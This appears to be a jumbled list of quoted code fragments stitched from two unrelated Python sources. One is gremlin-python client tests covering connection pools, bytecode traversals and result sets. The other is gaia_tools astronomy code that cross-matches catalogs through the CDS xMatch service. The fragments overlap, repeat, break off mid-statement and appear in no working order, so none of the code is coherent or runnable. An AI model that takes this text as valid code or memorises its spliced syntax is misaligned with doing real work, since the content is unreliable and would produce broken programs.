1').all().result()[0] == 2", "def test_client_bytecode(client): g = Graph().traversal() t = g.V() message =", "work for additional information regarding copyright ownership. The ASF licenses", "future has to finish for the second to yield result", "== 4 def test_client_eval_traversal(client): assert len(client.submit('g.V()').all().result()) == 6 def test_client_error(client):", "{'g': 'gmodern'}}) future = client.submitAsync(message) result_set = future.result() assert len(result_set.all().result())", "6 # with connection pool `future` may or may not", "RequestMessage('traversal', 'bytecode', {'gremlin': t.bytecode, 'aliases': {'g': 'gmodern'}}) future = client.submitAsync(message)", "or more contributor license agreements. See the NOTICE file distributed", "result in result_set: results += result assert len(results) == 1000", "'gmodern'}}) result_set = client.submit(message) assert len(result_set.all().result()) == 6 def test_client_bytecode_options(client):", "= client.submit(message) assert len(result_set.all().result()) == 6 def test_iterate_result_set(client): g =", "copyright ownership. The ASF licenses this file to you under", "Software Foundation (ASF) under one or more contributor license agreements.", "isinstance(results, list) assert results_set.done.done() assert 'host' in results_set.status_attributes def test_client_simple_eval(client):", "distributed with this work for additional information regarding copyright ownership.", "done here result_set = future.result() assert len(result_set.all().result()) == 6 def", "message = RequestMessage('traversal', 'bytecode', {'gremlin': t.bytecode, 'aliases': {'g': 'gmodern'}}) message2", "the pool size to be 1 again after query returned", "6 def test_client_async(client): g = Graph().traversal() t = g.V() message", "'gmodern'}}) result_set = client.submit(message) assert len(result_set.all().result()) == 6 def test_iterate_result_set(client):", "under the License. ''' import pytest from gremlin_python.driver.protocol import GremlinServerError", "in result_set: results += result assert len(results) == 1 t", "results_set.all() results = future.result() assert len(results) == 6 assert isinstance(results,", "Unless required by applicable law or agreed to in writing,", "by applicable law or agreed to in writing, software distributed", "access the internals of the strategy via bytecode g =", "expecting the pool size to be 1 again after query", "assert len(result_set2.all().result()) == 6 # This future has to finish", "= future.result() assert len(result_set.all().result()) == 6 def test_big_result_set(client): g =", "len(results) == 6 def test_client_async(client): g = Graph().traversal() t =", "pool_size=1 client client = Client('ws://localhost:45940/gremlin', 'gmodern', pool_size=1) try: # should", "result_set: results += result assert len(results) == 1 t =", "'<NAME> (<EMAIL>)' def test_connection(connection): g = Graph().traversal() t = g.V()", "result_set: results += result assert len(results) == 6 def test_client_async(client):", "def test_client_connection_pool_after_error(client): # Overwrite fixture with pool_size=1 client client =", "'gmodern'}}) future = client.submitAsync(message) result_set = future.result() assert len(result_set.all().result()) ==", "the Apache Software Foundation (ASF) under one or more contributor", "= future.result() assert len(results) == 6 assert isinstance(results, list) assert", "+= result assert len(results) == 10000 def test_big_result_set_secure(secure_client): g =", "NOTICE file distributed with this work for additional information regarding", "express or implied. See the License for the specific language", "the License. ''' import pytest from gremlin_python.driver.protocol import GremlinServerError from", "may not be done here result_set = future.result() assert len(result_set.all().result())", "''' Licensed to the Apache Software Foundation (ASF) under one", "test_client_simple_eval(client): assert client.submit('1 + 1').all().result()[0] == 2 def test_client_simple_eval_bindings(client): assert", "assert len(result_set2.all().result()) == 6 # with connection pool `future` may", "# Overwrite fixture with pool_size=1 client client = Client('ws://localhost:45940/gremlin', 'gmodern',", "import __ from gremlin_python.structure.graph import Graph __author__ = '<NAME> (<EMAIL>)'", "client.submit('1/0').all().result() assert False except GremlinServerError as gse: # expecting the", "len(result_set.all().result()) == 6 def test_iterate_result_set(client): g = Graph().traversal() t =", "yield result - pool_size=1 assert future.done() result_set = future.result() assert", "def test_client_eval_traversal(client): assert len(client.submit('g.V()').all().result()) == 6 def test_client_error(client): try: #", "client client = Client('ws://localhost:45940/gremlin', 'gmodern', pool_size=1) g = Graph().traversal() t", "4 def test_client_eval_traversal(client): assert len(client.submit('g.V()').all().result()) == 6 def test_client_error(client): try:", "\"test\", \"y\": True})).V() message = RequestMessage('traversal', 'bytecode', {'gremlin': t.bytecode, 'aliases':", "GremlinServerError as gse: # expecting the pool size to be", "assert len(results) == 10 t = g.V().limit(100) message = RequestMessage('traversal',", "assert len(results) == 100 t = g.V().limit(1000) message = RequestMessage('traversal',", "test_multi_conn_pool(client): g = Graph().traversal() t = g.V() message = RequestMessage('traversal',", "result - pool_size=1 assert future.done() result_set = future.result() assert len(result_set.all().result())", "obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required", "+= result assert len(results) == 10 t = g.V().limit(100) message", "x', {'x': 2}).all().result()[0] == 4 def test_client_eval_traversal(client): assert len(client.submit('g.V()').all().result()) ==", "# This future has to finish for the second to", "for result in result_set: results += result assert len(results) ==", "2 def test_client_simple_eval_bindings(client): assert client.submit('x + x', {'x': 2}).all().result()[0] ==", "future.done() result_set = future.result() assert len(result_set.all().result()) == 6 def test_multi_conn_pool(client):", "test_connection(connection): g = Graph().traversal() t = g.V() message = RequestMessage('traversal',", "assert client.submit('1 + 1').all().result()[0] == 2 def test_client_simple_eval_bindings(client): assert client.submit('x", "'stackTrace' in ex.status_attributes def test_client_connection_pool_after_error(client): # Overwrite fixture with pool_size=1", "result_set = future.result() assert len(result_set.all().result()) == 6 def test_connection_share(client): #", "''' import pytest from gremlin_python.driver.protocol import GremlinServerError from gremlin_python.driver.client import", "results += result assert len(results) == 1 t = g.V().limit(10)", "assert future.done() result_set = future.result() assert len(result_set.all().result()) == 6 def", "message = RequestMessage('traversal', 'bytecode', {'gremlin': t.bytecode, 'aliases': {'g': 'gmodern'}}) result_set", "# expecting the pool size to be 1 again after", "# with connection pool `future` may or may not be", "future.result() assert len(result_set.all().result()) == 6 def test_big_result_set(client): g = Graph().traversal()", "test_big_result_set_secure(secure_client): g = Graph().traversal() t = g.inject(1).repeat(__.addV('person').property('name', __.loops())).times(20000).count() message =", "with the License. You may obtain a copy of the", "result_set = client.submit(message) assert len(result_set.all().result()) == 6 ## t =", "t.bytecode, 'aliases': {'g': 'gmodern'}}) message2 = RequestMessage('traversal', 'bytecode', {'gremlin': t.bytecode,", "test perspective because there's no way to access the internals", "= g.V() message = RequestMessage('traversal', 'bytecode', {'gremlin': t.bytecode, 'aliases': {'g':", "message2 = RequestMessage('traversal', 'bytecode', {'gremlin': t.bytecode, 'aliases': {'g': 'gmodern'}}) client", "10000 def test_big_result_set_secure(secure_client): g = Graph().traversal() t = g.inject(1).repeat(__.addV('person').property('name', __.loops())).times(20000).count()", "= connection.write(message).result() future = results_set.all() results = future.result() assert len(results)", "future = client.submitAsync(message) future2 = client.submitAsync(message2) result_set2 = future2.result() assert", "{'g': 'gmodern'}}) results_set = connection.write(message).result() future = results_set.all() results =", "client.available_pool_size == 1 def test_client_bytecode(client): g = Graph().traversal() t =", "t.bytecode, 'aliases': {'g': 'gmodern'}}) future = client.submitAsync(message) result_set = future.result()", "list) assert results_set.done.done() assert 'host' in results_set.status_attributes def test_client_simple_eval(client): assert", "future2.result() assert len(result_set2.all().result()) == 6 # This future has to", "applicable law or agreed to in writing, software distributed under", "to yield result - pool_size=1 assert future.done() result_set = future.result()", "bytecode g = Graph().traversal() t = g.withStrategies(OptionsStrategy(options={\"x\": \"test\", \"y\": True})).V()", "test_client_eval_traversal(client): assert len(client.submit('g.V()').all().result()) == 6 def test_client_error(client): try: # should", "result assert len(results) == 6 def test_client_async(client): g = Graph().traversal()", "the License is distributed on an \"AS IS\" BASIS, WITHOUT", "the specific language governing permissions and limitations under the License.", "OptionsStrategy. no way to really validate this from an integration", "6 def test_connection_share(client): # Overwrite fixture with pool_size=1 client client", "results += result assert len(results) == 1000 t = g.V().limit(10000)", "'aliases': {'g': 'gmodern'}}) result_set = client.submit(message) results = [] for", "`future` may or may not be done here result_set =", "= future2.result() assert len(result_set2.all().result()) == 6 # with connection pool", "{'g': 'gmodern'}}) future = client.submitAsync(message) future2 = client.submitAsync(message2) result_set2 =", "this work for additional information regarding copyright ownership. The ASF", "connection.write(message).result() future = results_set.all() results = future.result() assert len(results) ==", "result_set = client.submit(message) assert len(result_set.all().result()) == 6 def test_client_bytecode_options(client): #", "or agreed to in writing, software distributed under the License", "this file to you under the Apache License, Version 2.0", "gremlin_python.driver.protocol import GremlinServerError from gremlin_python.driver.request import RequestMessage from gremlin_python.process.strategies import", "client.submit('1/0').all().result() assert False except GremlinServerError as ex: assert 'exceptions' in", "= client.submitAsync(message2) result_set2 = future2.result() assert len(result_set2.all().result()) == 6 #", "returned assert gse.status_code == 597 assert client.available_pool_size == 1 def", "= Graph().traversal() t = g.withStrategies(OptionsStrategy(options={\"x\": \"test\", \"y\": True})).V() message =", "result assert len(results) == 10 t = g.V().limit(100) message =", "this from an integration # test perspective because there's no", "to access the internals of the strategy via bytecode g", "t.bytecode, 'aliases': {'g': 'gmodern'}}) result_set = client.submit(message) results = []", "== 6 ## t = g.with_(\"x\", \"test\").with_(\"y\", True).V() message =", "license agreements. See the NOTICE file distributed with this work", "def test_client_error(client): try: # should fire an exception client.submit('1/0').all().result() assert", "OF ANY KIND, either express or implied. See the License", "client.submit(message) assert len(result_set.all().result()) == 6 def test_iterate_result_set(client): g = Graph().traversal()", "= future.result() assert len(result_set.all().result()) == 6 def test_multi_conn_pool(client): g =", "an exception client.submit('1/0').all().result() assert False except GremlinServerError as ex: assert", "client.submit(message) results = [] for result in result_set: results +=", "result_set = future.result() assert len(result_set.all().result()) == 6 def test_multi_conn_pool(client): g", "assert results_set.done.done() assert 'host' in results_set.status_attributes def test_client_simple_eval(client): assert client.submit('1", "'bytecode', {'gremlin': t.bytecode, 'aliases': {'g': 'gmodern'}}) result_set = client.submit(message) results", "Client('ws://localhost:45940/gremlin', 'g', pool_size=1) future = client.submitAsync(message) future2 = client.submitAsync(message2) result_set2", "License, Version 2.0 (the \"License\"); you may not use this", "Overwrite fixture with pool_size=1 client client = Client('ws://localhost:45940/gremlin', 'gmodern', pool_size=1)", "{'g': 'gmodern'}}) result_set = client.submit(message) assert len(result_set.all().result()) == 6 def", "= client.submit(message) assert len(result_set.all().result()) == 6 def test_client_bytecode_options(client): # smoke", "secure_client.submit(message) results = [] for result in result_set: results +=", "import RequestMessage from gremlin_python.process.strategies import OptionsStrategy from gremlin_python.process.graph_traversal import __", "__ from gremlin_python.structure.graph import Graph __author__ = '<NAME> (<EMAIL>)' def", "test_client_async(client): g = Graph().traversal() t = g.V() message = RequestMessage('traversal',", "a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by", "gremlin_python.structure.graph import Graph __author__ = '<NAME> (<EMAIL>)' def test_connection(connection): g", "GremlinServerError from gremlin_python.driver.request import RequestMessage from gremlin_python.process.strategies import OptionsStrategy from", "len(result_set.all().result()) == 6 ## t = g.with_(\"x\", \"test\").with_(\"y\", True).V() message", "t = g.V().limit(1000) message = RequestMessage('traversal', 'bytecode', {'gremlin': t.bytecode, 'aliases':", "License. You may obtain a copy of the License at", "== 1000 t = g.V().limit(10000) message = RequestMessage('traversal', 'bytecode', {'gremlin':", "pool_size=1) try: # should fire an exception client.submit('1/0').all().result() assert False", "not be done here result_set = future.result() assert len(result_set.all().result()) ==", "result_set: results += result assert len(results) == 10000 def test_big_result_set_secure(secure_client):", "6 def test_big_result_set(client): g = Graph().traversal() t = g.inject(1).repeat(__.addV('person').property('name', __.loops())).times(20000).count()", "result_set: results += result assert len(results) == 100 t =", "result assert len(results) == 1000 t = g.V().limit(10000) message =", "client.submit(message) assert len(result_set.all().result()) == 6 def test_client_bytecode_options(client): # smoke test", "'gmodern', pool_size=1) g = Graph().traversal() t = g.V() message =", "def test_client_simple_eval(client): assert client.submit('1 + 1').all().result()[0] == 2 def test_client_simple_eval_bindings(client):", "an \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY", "= Client('ws://localhost:45940/gremlin', 'g', pool_size=1) future = client.submitAsync(message) future2 = client.submitAsync(message2)", "test_connection_share(client): # Overwrite fixture with pool_size=1 client client = Client('ws://localhost:45940/gremlin',", "gremlin_python.driver.client import Client from gremlin_python.driver.protocol import GremlinServerError from gremlin_python.driver.request import", "client = Client('ws://localhost:45940/gremlin', 'gmodern', pool_size=1) try: # should fire an", "assert client.available_pool_size == 1 def test_client_bytecode(client): g = Graph().traversal() t", "'bytecode', {'gremlin': t.bytecode, 'aliases': {'g': 'gmodern'}}) client = Client('ws://localhost:45940/gremlin', 'g',", "query returned assert gse.status_code == 597 assert client.available_pool_size == 1", "## t = g.with_(\"x\", \"test\").with_(\"y\", True).V() message = RequestMessage('traversal', 'bytecode',", "'aliases': {'g': 'gmodern'}}) future = client.submitAsync(message) result_set = future.result() assert", "== 1 t = g.V().limit(10) message = RequestMessage('traversal', 'bytecode', {'gremlin':" ]
[ "2016-09-21 - Account for Gaia epoch 2015 - Bovy (UofT)", "cat2['ref_epoch'] else: epoch2= 2000. _check_epoch(cat1,epoch1) _check_epoch(cat2,epoch2) depoch= epoch2-epoch1 if numpy.any(depoch", "catalog INPUT cat - original catalog xcat - matched catalog", "= idx_1[temp_idx] d2d[cat2[col_field] == unique] = temp_d2d else: temp_idx, temp_d2d,", "interface INPUT: cat - a catalog to cross match, requires", "but not the other continue if swap: temp_idx, temp_d2d, d3d", "names=True, max_rows=1, dtype='float64') # only read the first row max", "xMatch batch {} / {} ...\\r\"\\ .format(thisrun1,nruns)) sys.stdout.flush() nruns_necessary= _cds_match_batched(resultfilename1,posfilename1,", "Dec with additional matching in the data tag specified by", "is None: os.remove(resultfilename) else: shutil.move(resultfilename,savefilename) # Match back to the", "if False, find closest matches in cat2 for each cat1", "different) INPUT: cat1 - First catalog cat2 - Second catalog", "in half cnt= 0 with open(posfilename,'r') as posfile: with open(posfilename1,'a')", "string raise KeyError(\"'%s' does not exist in both catalog\" %", "unique] = idx_2[temp_idx] d2d[cat1[col_field] == unique] = temp_d2d d2d =", "has duplicates) col_field= (None) if None, simply cross-match on RA", "skip_header=0, filling_values=-9999.99, names=True, dtype='float128') def cds_matchback(cat,xcat,colRA='RA',colDec='DEC',selection='best', epoch=None,colpmRA='pmra',colpmDec='pmdec',): \"\"\" NAME: cds_matchback", "warn_about_epoch= False if 'ref_epoch' in cat.dtype.fields: if 'designation' not in", "batches _cds_basic_match(resultfilename,posfilename,maxdist,selection,xcat) try: ma= cds_load(resultfilename) except ValueError: # Assume this", "numpy.arange(len(cat1)) idx[cat1[col_field] == unique] = idx_2[temp_idx] d2d[cat1[col_field] == unique] =", "cat with the proper motion in right ascension in degree", "do not have float128, but source_id is double # get", "as posfile1: with open(posfilename2,'a') as posfile2: for line in posfile:", "the opposite (important when one of the catalogs has duplicates)", "maxdist= (2) maximum distance in arcsec colRA1= ('RA') name of", "tag in cat with the right ascension colDec= ('DEC') name", "unit=(u.degree, u.degree),frame='icrs') if col_field is not None: try: # check", "ma.rename_column('mdec','DEC') finally: os.remove(xmlfilename) # Remove temporary files os.remove(posfilename) if savefilename", "numpy.uint64) return numpy.genfromtxt(filename, delimiter=',', skip_header=0, filling_values=-9999.99, names=True, dtype=dtype_list) else: return", "mc2[idx_2].match_to_catalog_sky(mc1[idx_1]) m1 = numpy.arange(len(cat2)) idx[cat2[col_field] == unique] = idx_1[temp_idx] d2d[cat2[col_field]", "else: if swap: idx,d2d,d3d = mc2.match_to_catalog_sky(mc1) m1= numpy.arange(len(cat2)) else: idx,d2d,d3d", "on input RA ma= cds_load(resultfilename) if gaia_all_columns: from astroquery.gaia import", "g.source_id\"\"\" % table_identifier, upload_resource=xmlfilename, upload_table_name=\"my_table\") ma= job.get_results() except: print(\"gaia_tools.xmath.cds failed", "at the end and filtered out d2d = numpy.ones(len(cat2)) *", "2000. if epoch2 is None: if 'ref_epoch' in cat2.dtype.fields: epoch2=", "additional catalog field matching - Leung (UofT) \"\"\" if epoch1", "(see http://cdsxmatch.u-strasbg.fr/xmatch/doc/available-tables.html; things like 'vizier:Tycho2' or 'vizier:I/345/gaia2') maxdist= (2) maximum", "= numpy.genfromtxt(filename, delimiter=',', skip_header=0, filling_values=-9999.99, names=True, max_rows=1, dtype='float64') # only", "# Count the number of objects with open(posfilename,'r') as posfile:", "colpmRA=colpmRA,colpmDec=colpmDec) return (ma,mai) def _cds_match_batched(resultfilename,posfilename,maxdist,selection,xcat, nruns_necessary=1): \"\"\"CDS xMatch (sometimes?) fails", "matching result= open(resultfilename,'w') try: subprocess.check_call(['curl', '-X','POST', '-F','request=xmatch', '-F','distMaxArcsec=%i' % maxdist,", "to the original catalog INPUT cat - original catalog xcat", "in uniques: # loop over the class idx_1 = numpy.arange(cat1[colRA1].shape[0])[cat1[col_field]", "cat.dtype.fields: epoch= cat['ref_epoch'] else: epoch= 2000. _check_epoch(cat,epoch) depoch= epoch-2000. if", "all gaia columns, returning just the default returned by the", "by xmatch.cds colRA= ('RA') name of the tag in cat", "ones which are untouched mindx= ((d2d < maxdist*u.arcsec) & (0.*u.arcsec", "and Dec; if a string, then cross-match on RA and", "with open(posfilename2,'w') as posfile2: with open(posfilename,'r') as posfile: posfile2.write(posfile.readline()) #", "source_id is always integer anyway # first read everything as", "Don't shift objects with non-existing proper motion dra[numpy.isnan(cat2[colpmRA2])]= 0. ddec[numpy.isnan(cat2[colpmDec2])]=", "in the data tag specified by the string OUTPUT: (index", "match, indices into cat of matching sources: index[0] is cat", "if epochs are different) INPUT: cat1 - First catalog cat2", "used when epochs are different] swap= (False) if False, find", "the other continue if swap: temp_idx, temp_d2d, d3d = mc2[idx_2].match_to_catalog_sky(mc1[idx_1])", "'source_id' being int64 dtype_list = [('{}'.format(i), numpy.float64) for i in", "CDS archive using the CDS cross-matching service (http://cdsxmatch.u-strasbg.fr/xmatch); uses the", "'ref_epoch' in cat2.dtype.fields: epoch2= cat2['ref_epoch'] else: epoch2= 2000. _check_epoch(cat1,epoch1) _check_epoch(cat2,epoch2)", "or 2015.5 (DR2), which may lead to incorrect matches\") return", "at http://cdsxmatch.u-strasbg.fr/xmatch/doc/API-calls.html) epoch= (2000.) epoch of the coordinates in cat", "* temp_d2d.unit # make sure finally we have an unit", "return nruns # xMatch failed because of time-out, split posfilename1=", "when epoch != 2000.] OUTPUT: Array indices into cat of", "mc2.match_to_catalog_sky(mc1) m1= numpy.arange(len(cat2)) else: idx,d2d,d3d = mc1.match_to_catalog_sky(mc2) m1= numpy.arange(len(cat1)) #", "2000.] colpmDec= ('pmdec') name of the tag in cat with", "# be using smaller batches _cds_basic_match(resultfilename,posfilename,maxdist,selection,xcat) try: ma= cds_load(resultfilename) except", "0.01): warn_about_epoch= True elif 'Gaia DR2' in cat['designation'][0].decode('utf-8'): if numpy.any(numpy.fabs(epoch-2015.5)", "xmatch.cds colRA= ('RA') name of the tag in cat with", "epoch1= cat1['ref_epoch'] else: epoch1= 2000. if epoch2 is None: if", "open(posfilename,'r') as posfile: with open(posfilename1,'a') as posfile1: with open(posfilename2,'a') as", "if False do the opposite (important when one of the", "can match back using cds_matchback OUTPUT: (xcat entries for those", "different] swap= (False) if False, find closest matches in cat2", "0: # the case where a class only exists in", "running runs= ''.join([str(int(r)-1) for r in posfilename1.split('csv.')[-1].split('.')]) nruns= 2**len(runs) thisrun1=", "intermediate files os.remove(posfilename1) os.remove(posfilename2) os.remove(resultfilename1) os.remove(resultfilename2) return nruns_necessary def _cds_basic_match(resultfilename,posfilename,maxdist,selection,xcat):", "this by squeezing precision from int64 on source_id as source_id", "0.01): warn_about_epoch= True if warn_about_epoch: warnings.warn(\"You appear to be using", "the tag in cat2 with the declination in degree in", "2015 - Bovy (UofT) 2019-07-07 - add additional catalog field", "to be ICRS) epoch1= (2000.) epoch of the coordinates in", "# Remove intermediate files os.remove(posfilename1) os.remove(posfilename2) os.remove(resultfilename1) os.remove(resultfilename2) return nruns_necessary", "selection= 'best' if selection == 'all': raise NotImplementedError(\"selection='all' CDS cross-match", "== 0 or idx_2.shape[0] == 0: # the case where", "temp_d2d, d3d = mc1[idx_1].match_to_catalog_sky(mc2[idx_2]) m1 = numpy.arange(len(cat1)) idx[cat1[col_field] == unique]", "motion to get both catalogs at the same time dra=cat[colpmRA]/numpy.cos(cat[colDec]/180.*numpy.pi)\\", "from CDS to this path; can match back using cds_matchback", "..load.download import _ERASESTR def xmatch(cat1,cat2,maxdist=2, colRA1='RA',colDec1='DEC',epoch1=None, colRA2='RA',colDec2='DEC',epoch2=None, colpmRA2='pmra',colpmDec2='pmdec', swap=False, col_field=None):", "for unique in uniques: # loop over the class idx_1", "in cat (assumed to be ICRS; includes cos(Dec)) [only used", "catalogs at the same time dra=cat2[colpmRA2]/numpy.cos(cat2[colDec2]/180.*numpy.pi)\\ /3600000.*depoch ddec= cat2[colpmDec2]/3600000.*depoch #", "match back using cds_matchback OUTPUT: (xcat entries for those that", "in posfile: if cnt == 0: cnt+= 1 continue if", "('DEC') name of the tag in cat2 with the declination", "if gaia_all_columns: from astroquery.gaia import Gaia # Write another temporary", "right ascension in degree in cat2 (assumed to be ICRS;", "to be ICRS; includes cos(Dec)) [only used when epoch !=", "colRA1='RA',colDec1='DEC',epoch1=None, colRA2='RA',colDec2='DEC',epoch2=None, colpmRA2='pmra',colpmDec2='pmdec', swap=False, col_field=None): \"\"\" NAME: xmatch PURPOSE: cross-match", "resultfilename= tempfile.mktemp('.csv',dir=os.getcwd()) with open(posfilename,'w') as csvfile: wr= csv.writer(csvfile,delimiter=',',quoting=csv.QUOTE_MINIMAL) wr.writerow(['RA','DEC']) for", "'-F','colDec1=DEC', '-F','cat2=%s' % xcat, 'http://cdsxmatch.u-strasbg.fr/xmatch/api/v1/sync'], stdout=result) except subprocess.CalledProcessError: os.remove(posfilename) if", "= list(data.dtype.names) # construct a list where everything is fp64", "Remove intermediate files os.remove(posfilename1) os.remove(posfilename2) os.remove(resultfilename1) os.remove(resultfilename2) return nruns_necessary def", "selection= ('best') select either all matches or the best match", "not work... savefilename= (None) if set, save the output from", "numpy.float64) for i in to_list] dtype_list[dtype_list.index(('source_id', numpy.float64))] = ('source_id', numpy.uint64)", "os.remove(posfilename2) os.remove(resultfilename1) os.remove(resultfilename2) return nruns_necessary def _cds_basic_match(resultfilename,posfilename,maxdist,selection,xcat): # Send to", "ddec[numpy.isnan(cat[colpmDec])]= 0. else: dra= numpy.zeros(len(cat)) ddec= numpy.zeros(len(cat)) # xmatch to", "import warnings WIN32= platform.system() == 'Windows' import numpy import astropy.coordinates", "a list where everything is fp64 except 'source_id' being int64", "same time dra=cat[colpmRA]/numpy.cos(cat[colDec]/180.*numpy.pi)\\ /3600000.*depoch ddec= cat[colpmDec]/3600000.*depoch # Don't shift objects", "default returned by the CDS xMatch instead...\") else: ma.rename_column('mra','RA') ma.rename_column('mdec','DEC')", "mai= cds_matchback(cat,ma,colRA=colRA,colDec=colDec,epoch=epoch, colpmRA=colpmRA,colpmDec=colpmDec) return (ma,mai) def _cds_match_batched(resultfilename,posfilename,maxdist,selection,xcat, nruns_necessary=1): \"\"\"CDS xMatch", "Write positions posfilename= tempfile.mktemp('.csv',dir=os.getcwd()) resultfilename= tempfile.mktemp('.csv',dir=os.getcwd()) with open(posfilename,'w') as csvfile:", "always integer anyway # first read everything as fp64 and", "Archive, which may or may not work... savefilename= (None) if", "Figure out which of the hierarchy we are running runs=", "if epoch2 is None: if 'ref_epoch' in cat2.dtype.fields: epoch2= cat2['ref_epoch']", "to CDS for matching result= open(resultfilename,'w') try: subprocess.check_call(['curl', '-X','POST', '-F','request=xmatch',", "try: job= Gaia.launch_job_async( \"\"\"select g.*, m.RA as mRA, m.DEC as", "specified by the string OUTPUT: (index into cat1 of matching", "Remove temporary files os.remove(posfilename) if savefilename is None: os.remove(resultfilename) else:", "open(resultfilename2,'r') as resultfile2: for line in resultfile2: if line[0] ==", "this runs a query at the Gaia Archive, which may", "end and filtered out d2d = numpy.ones(len(cat2)) * -1. idx", "with the right ascension in degree in cat2 (assumed to", "import numpy import astropy.coordinates as acoords from astropy.table import Table", "below) xcat= ('vizier:I/350/gaiaedr3') name of the catalog to cross-match against,", "matching in the data tag specified by the string OUTPUT:", "of the catalogs has duplicates) col_field= (None) if None, simply", "can complete else: if swap: idx,d2d,d3d = mc2.match_to_catalog_sky(mc1) m1= numpy.arange(len(cat2))", "xMatch (sometimes?) fails for large matches, because of a time-out,", "in posfilename1.split('csv.')[-1].split('.')]) nruns= 2**len(runs) thisrun1= 1+int(runs,2) thisrun2= 1+int(''.join([str(int(r)-1) for r", "epoch != 2000.] OUTPUT: Array indices into cat of xcat", "HISTORY: 2016-09-12 - Written - Bovy (UofT) 2016-09-21 - Account", "1e-5*u.arcsec return idx[mindx] def _check_epoch(cat,epoch): warn_about_epoch= False if 'ref_epoch' in", "\"\"\" NAME: cds PURPOSE: Cross-match against a catalog in the", "# Combine results with open(resultfilename,'w') as resultfile: with open(resultfilename1,'r') as", "temp_d2d d2d = d2d * temp_d2d.unit # make sure finally", "col_field= (None) if None, simply cross-match on RA and Dec;", "to retrieve all gaia columns, returning just the default returned", "d2d[cat1[col_field] == unique] = temp_d2d d2d = d2d * temp_d2d.unit", "- matched catalog returned by xmatch.cds colRA= ('RA') name of", "if numpy.any(depoch != 0.): # Use proper motion to get", "are different) INPUT: cat1 - First catalog cat2 - Second", "colpmRA2='pmra',colpmDec2='pmdec', swap=False, col_field=None): \"\"\" NAME: xmatch PURPOSE: cross-match two catalogs", "== 'all': raise NotImplementedError(\"selection='all' CDS cross-match not currently implemented\") if", "right ascension in degree in cat2 (assumed to be ICRS)", "matching objects) HISTORY: 2016-09-12 - Written - Bovy (UofT) 2016-09-21", "names=('source_id','RA','DEC'), dtype=('int64','float64','float64')) xmlfilename= tempfile.mktemp('.xml',dir=os.getcwd()) tab.write(xmlfilename,format='votable') #get the data release.... table_identifier", "source_id to int64 will keep its precision data = numpy.genfromtxt(filename,", "maximum distance in arcsec colRA1= ('RA') name of the tag", "epoch is None: if 'ref_epoch' in cat.dtype.fields: epoch= cat['ref_epoch'] else:", "matches, because of a time-out, so we recursively split until", "list(data.dtype.names) # construct a list where everything is fp64 except", "for large matches, because of a time-out, so we recursively", "a matched catalog from xmatch.cds back to the original catalog", "class only exists in one but not the other continue", "the catalog to cross-match against, in a format understood by", "(2) maximum distance in arcsec colRA1= ('RA') name of the", "to be ICRS) colDec1= ('DEC') name of the tag in", "to_list] dtype_list[dtype_list.index(('source_id', numpy.float64))] = ('source_id', numpy.uint64) return numpy.genfromtxt(filename, delimiter=',', skip_header=0,", "neg ones which are untouched mindx= ((d2d < maxdist*u.arcsec) &", "name to_list = list(data.dtype.names) # construct a list where everything", "ddec= numpy.zeros(len(cat)) # xmatch to v. small diff., because match", "of the tag in cat1 with the right ascension in", "Gaia epoch 2015 - Bovy (UofT) 2018-05-08 - Added gaia_all_columns", "with open(resultfilename1,'r') as resultfile1: for line in resultfile1: resultfile.write(line) with", "'all': raise NotImplementedError(\"selection='all' CDS cross-match not currently implemented\") # Write", "noticed at the end and filtered out d2d = numpy.ones(len(cat2))", "posfilename+'.1' posfilename2= posfilename+'.2' resultfilename1= resultfilename+'.1' resultfilename2= resultfilename+'.2' # Figure out", "import _ERASESTR def xmatch(cat1,cat2,maxdist=2, colRA1='RA',colDec1='DEC',epoch1=None, colRA2='RA',colDec2='DEC',epoch2=None, colpmRA2='pmra',colpmDec2='pmdec', swap=False, col_field=None): \"\"\"", "which of the hierarchy we are running runs= ''.join([str(int(r)-1) for", "a catalog in the CDS archive using the CDS cross-matching", "-1. idx = numpy.zeros(len(cat2), dtype=int) else: d2d = numpy.ones(len(cat1)) *", "untouch will be noticed at the end and filtered out", "time-out, split posfilename1= posfilename+'.1' posfilename2= posfilename+'.2' resultfilename1= resultfilename+'.1' resultfilename2= resultfilename+'.2'", "dtype='float128') def cds_matchback(cat,xcat,colRA='RA',colDec='DEC',selection='best', epoch=None,colpmRA='pmra',colpmDec='pmdec',): \"\"\" NAME: cds_matchback PURPOSE: Match a", "on RA and Dec; if a string, then cross-match on", "gaia columns, returning just the default returned by the CDS", "idx[mindx] if swap: return (m2,m1,d2d[mindx]) else: return (m1,m2,d2d[mindx]) def cds(cat,xcat='vizier:I/350/gaiaedr3',maxdist=2,colRA='RA',colDec='DEC',", "indices untouch will be noticed at the end and filtered", "cat - original catalog xcat - matched catalog returned by", "runs a query at the Gaia Archive, which may or", "subprocess import tempfile import warnings WIN32= platform.system() == 'Windows' import", "epoch 2015 - Bovy (UofT) 2018-05-08 - Added gaia_all_columns -", "field actually exists in both cat1/cat2 cat1[col_field] cat2[col_field] except KeyError:", "(xcat entries for those that match, indices into cat of", "epochs are different] colpmDec2= ('pmdec') name of the tag in", "else: ma.rename_column('mra','RA') ma.rename_column('mdec','DEC') finally: os.remove(xmlfilename) # Remove temporary files os.remove(posfilename)", "things like 'vizier:Tycho2' or 'vizier:I/345/gaia2') maxdist= (2) maximum distance in", "implemented\") if epoch is None: if 'ref_epoch' in cat.dtype.fields: epoch=", "code - Bovy (UofT) 2016-09-21 - Account for Gaia epoch", "back using cds_matchback OUTPUT: (xcat entries for those that match,", "- Bovy (UofT) 2018-05-08 - Added gaia_all_columns - Bovy (UofT)", "Added gaia_all_columns - Bovy (UofT) \"\"\" if epoch is None:", "posfile) # Write the header line with open(posfilename1,'w') as posfile1:", "None def cds_load(filename): if WIN32: # windows do not have", "into cat2 of matching objects, angular separation between matching objects)", "split posfilename1= posfilename+'.1' posfilename2= posfilename+'.2' resultfilename1= resultfilename+'.1' resultfilename2= resultfilename+'.2' #", "('DEC') name of the tag in cat1 with the declination", "csv.writer(csvfile,delimiter=',',quoting=csv.QUOTE_MINIMAL) wr.writerow(['RA','DEC']) for ii in range(len(cat)): wr.writerow([(cat[ii][colRA]-dra[ii]+360.) % 360., cat[ii][colDec]]-ddec[ii])", "will keep its precision data = numpy.genfromtxt(filename, delimiter=',', skip_header=0, filling_values=-9999.99,", "# xmatch to v. small diff., because match is against", "http://cdsxmatch.u-strasbg.fr/xmatch/doc/API-calls.html) epoch= (2000.) epoch of the coordinates in cat colpmRA=", "delimiter=',', skip_header=0, 